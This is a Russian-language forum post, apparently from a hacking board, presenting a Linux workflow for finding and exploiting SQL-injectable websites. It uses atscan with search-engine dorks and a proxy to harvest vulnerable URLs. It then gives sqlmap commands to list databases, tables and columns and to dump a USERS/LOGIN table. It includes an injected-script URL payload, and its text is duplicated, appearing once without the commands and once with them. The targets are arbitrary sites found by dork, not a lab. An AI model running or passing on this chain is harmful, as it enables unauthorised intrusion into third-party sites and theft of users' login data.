Сегодня расскажу про некий аналог SQLi Dumper под линукс.
Как видим из названия темы, нам подадобится установленные atscan и sqlmap.
Как установить думаю рассказывать не буду.
Начнем с поиска уязвимостей, для этого нужно заготовить дорк, ну или список дорок в текстовом файле.
Разберем параметры.
--dork - Поиск по дорке (ам)
--proxy - Использовать прокси
--level - Количество страниц для поиска
-m - Использовать поисковые системы ( all = все )
--sql - искать sql уязвимости.
Вот так можно использовать списки:
Где path - путь, file.txt - файл со списком.
Ссылки на уязвимсти будут отображены в строке SCAN.
Будут попадатся ссылки такого типа:
Но нас интересуют только такого типа:
Отсканировали - идем далее...
Отсканируем с помощью SQLMAP наш уязвимый сайт на наличие баз:
В зависимсоти от ситуации нам могут предложить разные варианты сканирования - читаем соглашаемся, те кто с англиским не знаком - пользуемся переводчиком.
В конце снизу у вас должны отобразиться базы. Выглядят они примерно так:
[ * ] information_schema
[ * ] db300987912
[ * ] USERS
Предположим мы хотим посмотреть таблицы базы USERS, ведем в терминале:
Чтобы посмотреть колонки таблицы, напишем:
Чтобы сдампить всю таблицу пишем:
Чтобы сдампить определенные колонки - пишем:
Дамп сохраняется по пути:
/root/.sqlmap/output/
Ну вот собственно и все
Как видим из названия темы, нам подадобится установленные atscan и sqlmap.
Как установить думаю рассказывать не буду.
Начнем с поиска уязвимостей, для этого нужно заготовить дорк, ну или список дорок в текстовом файле.
Код:
atscan --dork "product.php?" --proxy socks4://176.15.122.53:9999 --level 10 -m all --sql
--dork - Поиск по дорке (ам)
--proxy - Использовать прокси
--level - Количество страниц для поиска
-m - Использовать поисковые системы ( all = все )
--sql - искать sql уязвимости.
Вот так можно использовать списки:
Код:
atscan --dork /path/file.txt --proxy /path/file.txt --level 10 -m all --sql
Ссылки на уязвимсти будут отображены в строке SCAN.
Будут попадатся ссылки такого типа:
Код:
https://www.site.com%22%3Ehead%3Cscript%3Ealert(%27MySQL%20Error%27)%3C%2Fscript%3Ehead%22%3E%22%00
Код:
http://www.site.com/rus/products/product.php?productID=25%27
Отсканируем с помощью SQLMAP наш уязвимый сайт на наличие баз:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 --dbs
В конце снизу у вас должны отобразиться базы. Выглядят они примерно так:
[ * ] information_schema
[ * ] db300987912
[ * ] USERS
Предположим мы хотим посмотреть таблицы базы USERS, ведем в терминале:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS --tables
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS -T LOGIN --columns
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS --dump
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS -T LOGIN --dump
/root/.sqlmap/output/
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Ну вот собственно и все
Последнее редактирование модератором: